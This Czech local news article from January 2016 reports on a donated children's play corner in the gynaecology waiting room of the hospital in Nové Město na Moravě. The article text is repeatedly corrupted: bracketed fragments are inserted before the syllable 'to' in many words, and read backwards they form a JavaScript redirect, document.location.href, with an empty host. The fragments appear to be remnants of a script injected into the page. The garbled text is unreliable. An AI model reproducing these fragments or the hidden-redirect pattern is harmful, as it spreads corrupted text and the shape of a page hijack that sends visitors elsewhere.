Rainbow page separator

V čekárně gynekologie v nemocnici přibude dětský koutek

Pátek, 29. ledna 2016

Nové Měs[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to na Moravě / Nový hrací koutek pro děti v dohledné době přibude v čekárně gynekologicko-porodnického oddělení novoměstské nemocnice. Účelem je, aby se po dobu čekání zabavily malé děti, které s sebou maminky na mateřské dovolené čas[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to musí k lékaři brát s sebou, pro[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tože jim je nemá kdo ohlídat.
První počin, a [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to hračky pro děti za více jak osm tisíc korun, do [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];toho[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to koutku v minulých dnech pořídili a v nemocnici předali zástupci radnice v Novém Městě na Moravě.
„Za hračky dárcům velice děkujeme,“ uvedl mluvčí novoměstské nemocnice Roman Kra[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tochvíl. Pacientek, které musí docházet do gynekologické ambulance s malými dětmi, v posledních letech přibývá.